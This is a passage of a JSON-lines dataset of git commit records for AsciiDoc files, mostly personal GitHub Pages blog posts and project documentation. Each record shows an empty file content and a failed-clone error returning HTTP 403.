403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"31e272dfccdb7308612604cc7e917bd2a5a158bf","subject":"Update 2015-09-2-Daisies-arent-roses.adoc","message":"Update 2015-09-2-Daisies-arent-roses.adoc","repos":"2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io","old_file":"_posts\/2015-09-2-Daisies-arent-roses.adoc","new_file":"_posts\/2015-09-2-Daisies-arent-roses.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/2wce\/2wce.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"85d48dd51366920445f5cf927dfaea43a33b025f","subject":"Publish 1993-11-17.adoc","message":"Publish 1993-11-17.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"1993-11-17.adoc","new_file":"1993-11-17.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e9a7e498649f58ba36eea913478913f0acd1d4e8","subject":"Update 2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","message":"Update 2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","new_file":"_posts\/2016-07-29-Stable-Matching-Algorithm-in-progress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d3d68a9d923708477f6ca232beaa96292610cf98","subject":"Update 2018-07-02-Quick-Tips-2-CS-S-Transform-checkmark.adoc","message":"Update 2018-07-02-Quick-Tips-2-CS-S-Transform-checkmark.adoc","repos":"heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io","old_file":"_posts\/2018-07-02-Quick-Tips-2-CS-S-Transform-checkmark.adoc","new_file":"_posts\/2018-07-02-Quick-Tips-2-CS-S-Transform-checkmark.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/heliomsolivas\/heliomsolivas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bbb414e2a72a744a95f57b236cd88fcd58b7a062","subject":"y2b create post 3 Cool Tech Deals - #2","message":"y2b create post 3 Cool Tech Deals - #2","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-06-03-3-Cool-Tech-Deals--2.adoc","new_file":"_posts\/2015-06-03-3-Cool-Tech-Deals--2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"75805856182e8f7699d6e00f944f490e51dc97d3","subject":"Update 2015-09-17-JXLS-Reporting-Excel.adoc","message":"Update 2015-09-17-JXLS-Reporting-Excel.adoc","repos":"Ellixo\/ellixo.github.io,Ellixo\/ellixo.github.io,Ellixo\/ellixo.github.io","old_file":"_posts\/2015-09-17-JXLS-Reporting-Excel.adoc","new_file":"_posts\/2015-09-17-JXLS-Reporting-Excel.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Ellixo\/ellixo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9a6f02bb1660c00e6913d9a92a4208511b0db259","subject":"Update 2014-12-04-Ships-Maps-Dev-Diary.adoc","message":"Update 2014-12-04-Ships-Maps-Dev-Diary.adoc","repos":"Sth0nian\/hubpress.io,Sth0nian\/hubpress.io,Sth0nian\/hubpress.io","old_file":"_posts\/2014-12-04-Ships-Maps-Dev-Diary.adoc","new_file":"_posts\/2014-12-04-Ships-Maps-Dev-Diary.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Sth0nian\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b6ed9ac863ee30528e3a27154a3d50cb0e261778","subject":"Update 2018-06-01-FW4SPL-1610-released.adoc","message":"Update 2018-06-01-FW4SPL-1610-released.adoc","repos":"fw4spl-org\/fw4spl-blog,fw4spl-org\/fw4spl-blog,fw4spl-org\/fw4spl-blog","old_file":"_posts\/2018-06-01-FW4SPL-1610-released.adoc","new_file":"_posts\/2018-06-01-FW4SPL-1610-released.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fw4spl-org\/fw4spl-blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"72ef8e362bd8f32644bb95ab0ee1933d3dc96c90","subject":"minor fix @mszopos","message":"minor fix @mszopos\n","repos":"feelpp\/www.feelpp.org,feelpp\/www.feelpp.org,feelpp\/www.feelpp.org,feelpp\/www.feelpp.org,feelpp\/www.feelpp.org","old_file":"_posts\/publications\/2017-05-21-stokesbc.adoc","new_file":"_posts\/publications\/2017-05-21-stokesbc.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/feelpp\/www.feelpp.org.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9288905ce9b8e02e61824cf8b81e3ff9af6a238f","subject":"Add the stickler-passenger-config man page","message":"Add the stickler-passenger-config man page","repos":"copiousfreetime\/stickler,copiousfreetime\/stickler","old_file":"man\/stickler-passenger-config.asciidoc","new_file":"man\/stickler-passenger-config.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/copiousfreetime\/stickler.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d1d705de2612e455ab20704fbe544248e65ed8d1","subject":"Update 2016-10-03-lid-close-enlightenment-020-fedora.adoc","message":"Update 2016-10-03-lid-close-enlightenment-020-fedora.adoc","repos":"InformatiQ\/informatiq.github.io,InformatiQ\/informatiq.github.io,InformatiQ\/informatiq.github.io,InformatiQ\/informatiq.github.io","old_file":"_posts\/2016-10-03-lid-close-enlightenment-020-fedora.adoc","new_file":"_posts\/2016-10-03-lid-close-enlightenment-020-fedora.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InformatiQ\/informatiq.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e7877c67c6c59d101dbdc071856d320fb8dbc18d","subject":"Aggiunte un paio di note","message":"Aggiunte un paio di note\n","repos":"gionatamassibenincasa\/scrittura_con_asciidoc,gionatamassibenincasa\/scrittura_con_asciidoc,gionatamassibenincasa\/scrittura_con_asciidoc","old_file":"scrittura_ts_asciidoc.adoc","new_file":"scrittura_ts_asciidoc.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gionatamassibenincasa\/scrittura_con_asciidoc.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"8e84da4c4d3b8fb046a87f56ac9783a9cfd40fd8","subject":"Benchmarker report mentions logging level used. Contributed by Matej \u010cimbora.","message":"Benchmarker report mentions logging level used. Contributed by Matej \u010cimbora.\n","repos":"droolsjbpm\/optaplanner-website,oskopek\/optaplanner-website,droolsjbpm\/optaplanner-website,droolsjbpm\/optaplanner-website,bibryam\/optaplanner-website,psiroky\/optaplanner-website,bibryam\/optaplanner-website,oskopek\/optaplanner-website,psiroky\/optaplanner-website,oskopek\/optaplanner-website,bibryam\/optaplanner-website,psiroky\/optaplanner-website","old_file":"download\/releaseNotes\/releaseNotes6.3.adoc","new_file":"download\/releaseNotes\/releaseNotes6.3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oskopek\/optaplanner-website.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9de81123201e66eddc82b8b70c7a4e458225211f","subject":"v.194","message":"v.194\n","repos":"kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core","old_file":"release_notes.asciidoc","new_file":"release_notes.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kisel\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"996531de7df94ec61911dd66394aa6a020afaaf9","subject":"y2b create post MacBook Air Core i5 Unboxing (July 2011)","message":"y2b create post MacBook Air Core i5 Unboxing (July 2011)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-07-21-MacBook-Air-Core-i5-Unboxing-July-2011.adoc","new_file":"_posts\/2011-07-21-MacBook-Air-Core-i5-Unboxing-July-2011.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2e63f07b63f7e3e31dc303aee94732fe5cc2b905","subject":"Update 2015-07-29-Primeras-impresiones-usando-Windows-10.adoc","message":"Update 2015-07-29-Primeras-impresiones-usando-Windows-10.adoc","repos":"TommyHernandez\/tommyhernandez.github.io,TommyHernandez\/tommyhernandez.github.io,TommyHernandez\/tommyhernandez.github.io","old_file":"_posts\/2015-07-29-Primeras-impresiones-usando-Windows-10.adoc","new_file":"_posts\/2015-07-29-Primeras-impresiones-usando-Windows-10.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TommyHernandez\/tommyhernandez.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c6eb959a16cdc7d38e219bdcc521dfac8b1cb623","subject":"Added Endpoint completer to adoc","message":"Added Endpoint completer to adoc\n","repos":"pmoerenhout\/camel,Fabryprog\/camel,punkhorn\/camel-upstream,CodeSmell\/camel,pmoerenhout\/camel,pax95\/camel,mcollovati\/camel,pmoerenhout\/camel,gnodet\/camel,ullgren\/camel,christophd\/camel,pmoerenhout\/camel,adessaigne\/camel,tadayosi\/camel,kevinearls\/camel,pmoerenhout\/camel,davidkarlsen\/camel,christophd\/camel,punkhorn\/camel-upstream,mcollovati\/camel,adessaigne\/camel,kevinearls\/camel,gnodet\/camel,tadayosi\/camel,cunningt\/camel,tadayosi\/camel,ullgren\/camel,objectiser\/camel,Fabryprog\/camel,alvinkwekel\/camel,tdiesler\/camel,kevinearls\/camel,nikhilvibhav\/camel,ullgren\/camel,kevinearls\/camel,tadayosi\/camel,tdiesler\/camel,kevinearls\/camel,cunningt\/camel,alvinkwekel\/camel,alvinkwekel\/camel,DariusX\/camel,apache\/camel,nicolaferraro\/camel,CodeSmell\/camel,Fabryprog\/camel,nicolaferraro\/camel,adessaigne\/camel,christophd\/camel,davidkarlsen\/camel,pax95\/camel,pax95\/camel,adessaigne\/camel,nikhilvibhav\/camel,mcollovati\/camel,punkhorn\/camel-upstream,tadayosi\/camel,tdiesler\/camel,tadayosi\/camel,objectiser\/camel,christophd\/camel,apache\/camel,christophd\/camel,zregvart\/camel,CodeSmell\/camel,pax95\/camel,kevinearls\/camel,objectiser\/camel,tdiesler\/camel,adessaigne\/camel,nicolaferraro\/camel,cunningt\/camel,ullgren\/camel,nikhilvibhav\/camel,tdiesler\/camel,adessaigne\/camel,DariusX\/camel,alvinkwekel\/camel,zregvart\/camel,nicolaferraro\/camel,pmoerenhout\/camel,mcollovati\/camel,Fabryprog\/camel,gnodet\/camel,pax95\/camel,gnodet\/camel,DariusX\/camel,apache\/camel,punkhorn\/camel-upstream,apache\/camel,objectiser\/camel,davidkarlsen\/camel,tdiesler\/camel,zregvart\/camel,apache\/camel,pax95\/camel,CodeSmell\/camel,christophd\/camel,gnodet\/camel,cunningt\/camel,apache\/camel,davidkarlsen\/camel,cunningt\/camel,cunningt\/camel,zregvart\/camel,nikhilvibhav\/camel,DariusX\/camel","old_file":"docs\/user-manual\/en\/endpoint-completer.adoc","new_file":"docs\/user-manual\/en\/endpoint-completer.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"39b49a2123f6f0063efae194526d9c42837754bc","subject":"Update 2016-10-08-Hi-my-name-is-Mahendra-Gudhakesa.adoc","message":"Update 2016-10-08-Hi-my-name-is-Mahendra-Gudhakesa.adoc","repos":"gudhakesa\/gudhakesa.github.io,gudhakesa\/gudhakesa.github.io,gudhakesa\/gudhakesa.github.io,gudhakesa\/gudhakesa.github.io","old_file":"_posts\/2016-10-08-Hi-my-name-is-Mahendra-Gudhakesa.adoc","new_file":"_posts\/2016-10-08-Hi-my-name-is-Mahendra-Gudhakesa.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gudhakesa\/gudhakesa.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e7e8d60bd8b5e6e043be230efdded1f573f94bbc","subject":"Update 2018-03-06-Creating-a-custom-select-element.adoc","message":"Update 2018-03-06-Creating-a-custom-select-element.adoc","repos":"heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io,heliomsolivas\/heliomsolivas.github.io","old_file":"_posts\/2018-03-06-Creating-a-custom-select-element.adoc","new_file":"_posts\/2018-03-06-Creating-a-custom-select-element.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/heliomsolivas\/heliomsolivas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0c65587b6f7784400b46715f102b656307b44a83","subject":"Update 2015-06-29-Im-joining-4finance.adoc","message":"Update 2015-06-29-Im-joining-4finance.adoc","repos":"alvarosanchez\/alvarosanchez.github.io,alvarosanchez\/alvarosanchez.github.io,alvarosanchez\/alvarosanchez.github.io,alvarosanchez\/alvarosanchez.github.io","old_file":"_posts\/2015-06-29-Im-joining-4finance.adoc","new_file":"_posts\/2015-06-29-Im-joining-4finance.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/alvarosanchez\/alvarosanchez.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1736f5dbc8a6b60aff5abc0a961127c619a47763","subject":"Update 2015-10-01-Daisies-arent-roses.adoc","message":"Update 2015-10-01-Daisies-arent-roses.adoc","repos":"2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io","old_file":"_posts\/2015-10-01-Daisies-arent-roses.adoc","new_file":"_posts\/2015-10-01-Daisies-arent-roses.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/2wce\/2wce.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"63dcd5f1d657c89ea7c0518b707c9b482430c966","subject":"Update 2015-05-14-bla.adoc","message":"Update 2015-05-14-bla.adoc","repos":"florianhofmann\/florianhofmann.github.io,florianhofmann\/florianhofmann.github.io,florianhofmann\/florianhofmann.github.io","old_file":"_posts\/2015-05-14-bla.adoc","new_file":"_posts\/2015-05-14-bla.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/florianhofmann\/florianhofmann.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5357dc7102f26292090c4286968ec7869bc7d132","subject":"Create 2015-10-15-forge-2.20.0.final.asciidoc","message":"Create 2015-10-15-forge-2.20.0.final.asciidoc\n","repos":"forge\/docs,luiz158\/docs,luiz158\/docs,forge\/docs","old_file":"news\/2015-10-15-forge-2.20.0.final.asciidoc","new_file":"news\/2015-10-15-forge-2.20.0.final.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/forge\/docs.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"b1cab21f18ddb43eb557f72332c69ef079d75a32","subject":"y2b create post Targus Versavu Keyboard Case for iPad 3 (3rd Gen) Unboxing \\u0026 Overview","message":"y2b create post Targus Versavu Keyboard Case for iPad 3 (3rd Gen) Unboxing \\u0026 Overview","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-05-14-Targus-Versavu-Keyboard-Case-for-iPad-3-3rd-Gen-Unboxing-u0026-Overview.adoc","new_file":"_posts\/2012-05-14-Targus-Versavu-Keyboard-Case-for-iPad-3-3rd-Gen-Unboxing-u0026-Overview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"57aa7637b4750b11b72ce85a8de97436018bf4ad","subject":"Update 2017-02-03-What-Git-Lab-Left-Us.adoc","message":"Update 2017-02-03-What-Git-Lab-Left-Us.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-02-03-What-Git-Lab-Left-Us.adoc","new_file":"_posts\/2017-02-03-What-Git-Lab-Left-Us.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cb8e1c33b2bb82e922565b43d00de18fc5ad3b00","subject":"Update 2016-03-20-rhume-incessant-toux-mal-de-gorge-recurrent.adoc","message":"Update 2016-03-20-rhume-incessant-toux-mal-de-gorge-recurrent.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-20-rhume-incessant-toux-mal-de-gorge-recurrent.adoc","new_file":"_posts\/2016-03-20-rhume-incessant-toux-mal-de-gorge-recurrent.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e1c58108d74cbe303fa05905027b2a602358972b","subject":"Update 2014-06-26-Code-responsibility.adoc","message":"Update 2014-06-26-Code-responsibility.adoc","repos":"wanjee\/wanjee.github.io,wanjee\/wanjee.github.io,wanjee\/wanjee.github.io","old_file":"_posts\/2014-06-26-Code-responsibility.adoc","new_file":"_posts\/2014-06-26-Code-responsibility.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/wanjee\/wanjee.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9ba64fee2110427f5e97b05141b3505ae64815e4","subject":"Update 2015-09-19-Box-Model-Challenge.adoc","message":"Update 2015-09-19-Box-Model-Challenge.adoc","repos":"rh0\/the-myriad-path,rh0\/the-myriad-path,rh0\/the-myriad-path","old_file":"_posts\/2015-09-19-Box-Model-Challenge.adoc","new_file":"_posts\/2015-09-19-Box-Model-Challenge.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rh0\/the-myriad-path.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5efdabf0060b2faa0ae6e35f62a3d1070c1f7755","subject":"Regen of Regen","message":"Regen of Regen\n","repos":"davidkarlsen\/camel,CodeSmell\/camel,tdiesler\/camel,gnodet\/camel,ullgren\/camel,apache\/camel,alvinkwekel\/camel,DariusX\/camel,CodeSmell\/camel,tdiesler\/camel,adessaigne\/camel,apache\/camel,davidkarlsen\/camel,tadayosi\/camel,apache\/camel,DariusX\/camel,ullgren\/camel,christophd\/camel,cunningt\/camel,pmoerenhout\/camel,alvinkwekel\/camel,mcollovati\/camel,alvinkwekel\/camel,nicolaferraro\/camel,nicolaferraro\/camel,apache\/camel,nikhilvibhav\/camel,cunningt\/camel,tdiesler\/camel,zregvart\/camel,adessaigne\/camel,cunningt\/camel,gnodet\/camel,mcollovati\/camel,CodeSmell\/camel,alvinkwekel\/camel,nikhilvibhav\/camel,christophd\/camel,objectiser\/camel,cunningt\/camel,cunningt\/camel,pax95\/camel,adessaigne\/camel,gnodet\/camel,davidkarlsen\/camel,apache\/camel,Fabryprog\/camel,zregvart\/camel,objectiser\/camel,tadayosi\/camel,nicolaferraro\/camel,pmoerenhout\/camel,gnodet\/camel,tadayosi\/camel,gnodet\/camel,pax95\/camel,christophd\/camel,objectiser\/camel,Fabryprog\/camel,christophd\/camel,tdiesler\/camel,tdiesler\/camel,Fabryprog\/camel,pax95\/camel,pmoerenhout\/camel,DariusX\/camel,objectiser\/camel,pmoerenhout\/camel,pax95\/camel,cunningt\/camel,Fabryprog\/camel,davidkarlsen\/camel,christophd\/camel,adessaigne\/camel,mcollovati\/camel,nikhilvibhav\/camel,nikhilvibhav\/camel,ullgren\/camel,apache\/camel,zregvart\/camel,adessaigne\/camel,tadayosi\/camel,pmoerenhout\/camel,pmoerenhout\/camel,tadayosi\/camel,zregvart\/camel,pax95\/camel,CodeSmell\/camel,tdiesler\/camel,ullgren\/camel,nicolaferraro\/camel,pax95\/camel,mcollovati\/camel,adessaigne\/camel,christophd\/camel,DariusX\/camel,tadayosi\/camel","old_file":"components\/readme.adoc","new_file":"components\/readme.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"fea1a0b80a30c91ecfc83890ed29f59bb03427e4","subject":"Update 2017-03-20-Long-build-time-complicates-doing-proper-code-review-and-what-to-do-with-it.adoc","message":"Update 2017-03-20-Long-build-time-complicates-doing-proper-code-review-and-what-to-do-with-it.adoc","repos":"mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io,mikealdo\/mikealdo.github.io","old_file":"_posts\/2017-03-20-Long-build-time-complicates-doing-proper-code-review-and-what-to-do-with-it.adoc","new_file":"_posts\/2017-03-20-Long-build-time-complicates-doing-proper-code-review-and-what-to-do-with-it.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mikealdo\/mikealdo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4b8a49cb0f5ae1bd21385b132d8c89219245086e","subject":"Update 2015-10-05-Hell-Cell-Number-3.adoc","message":"Update 2015-10-05-Hell-Cell-Number-3.adoc","repos":"2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io","old_file":"_posts\/2015-10-05-Hell-Cell-Number-3.adoc","new_file":"_posts\/2015-10-05-Hell-Cell-Number-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/2wce\/2wce.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a4cb1353255d05e2b0c0540a770225ae11223b17","subject":"Update 2016-04-08-Un-poco-de-Harding.adoc","message":"Update 2016-04-08-Un-poco-de-Harding.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-08-Un-poco-de-Harding.adoc","new_file":"_posts\/2016-04-08-Un-poco-de-Harding.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"68f50fa5657d4645445b93208ef95202f59decec","subject":"Update 2017-05-31-Naming-Conventions.adoc","message":"Update 2017-05-31-Naming-Conventions.adoc","repos":"nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io,nilsonline\/nilsonline.github.io","old_file":"_posts\/2017-05-31-Naming-Conventions.adoc","new_file":"_posts\/2017-05-31-Naming-Conventions.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nilsonline\/nilsonline.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2124eea7dbe57145566fc4f7b775198177469785","subject":"Update 2018-08-25-Laravel56-Response.adoc","message":"Update 2018-08-25-Laravel56-Response.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-08-25-Laravel56-Response.adoc","new_file":"_posts\/2018-08-25-Laravel56-Response.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c487277d75b25f73893283cde0b40adfbafd4765","subject":"y2b create post World's Smallest Video Drone!","message":"y2b create post World's Smallest Video Drone!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-03-27-Worlds-Smallest-Video-Drone.adoc","new_file":"_posts\/2017-03-27-Worlds-Smallest-Video-Drone.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d96907bca3e1fafaf2249a4845e6ad9e5977f675","subject":"Update 2017-07-11-the-students-outpost-about3.adoc","message":"Update 2017-07-11-the-students-outpost-about3.adoc","repos":"TheStudentsOutpost\/TheStudentsOutpost.github.io,TheStudentsOutpost\/TheStudentsOutpost.github.io,TheStudentsOutpost\/TheStudentsOutpost.github.io,TheStudentsOutpost\/TheStudentsOutpost.github.io","old_file":"_posts\/2017-07-11-the-students-outpost-about3.adoc","new_file":"_posts\/2017-07-11-the-students-outpost-about3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TheStudentsOutpost\/TheStudentsOutpost.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1e383eb77c7a04cf73ceed8a2d653253483cc4fd","subject":"Update 2017-08-06-WWJQD-What-Would-j-Query-Do.adoc","message":"Update 2017-08-06-WWJQD-What-Would-j-Query-Do.adoc","repos":"ashelle\/ashelle.github.io,ashelle\/ashelle.github.io,ashelle\/ashelle.github.io,ashelle\/ashelle.github.io","old_file":"_posts\/2017-08-06-WWJQD-What-Would-j-Query-Do.adoc","new_file":"_posts\/2017-08-06-WWJQD-What-Would-j-Query-Do.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ashelle\/ashelle.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"50c8df96012baf9d1ad7843f3bb93db69b157290","subject":"Update 2016-06-11-Como-usar-este-editor.adoc","message":"Update 2016-06-11-Como-usar-este-editor.adoc","repos":"LearningTools\/LearningTools.github.io,LearningTools\/LearningTools.github.io,LearningTools\/LearningTools.github.io,LearningTools\/LearningTools.github.io","old_file":"_posts\/2016-06-11-Como-usar-este-editor.adoc","new_file":"_posts\/2016-06-11-Como-usar-este-editor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/LearningTools\/LearningTools.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"15eff837d4ddcd7dc09e92acfb77cdc296435ae4","subject":"Update 2016-08-22-Waging-War-on-Windows.adoc","message":"Update 2016-08-22-Waging-War-on-Windows.adoc","repos":"bretonio\/bretonio.github.io,bretonio\/bretonio.github.io,bretonio\/bretonio.github.io,bretonio\/bretonio.github.io","old_file":"_posts\/2016-08-22-Waging-War-on-Windows.adoc","new_file":"_posts\/2016-08-22-Waging-War-on-Windows.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bretonio\/bretonio.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9fd9848ba8477313b3e1da6bded1158485074158","subject":"Update 2017-07-07-Payment-Request-A-P-I.adoc","message":"Update 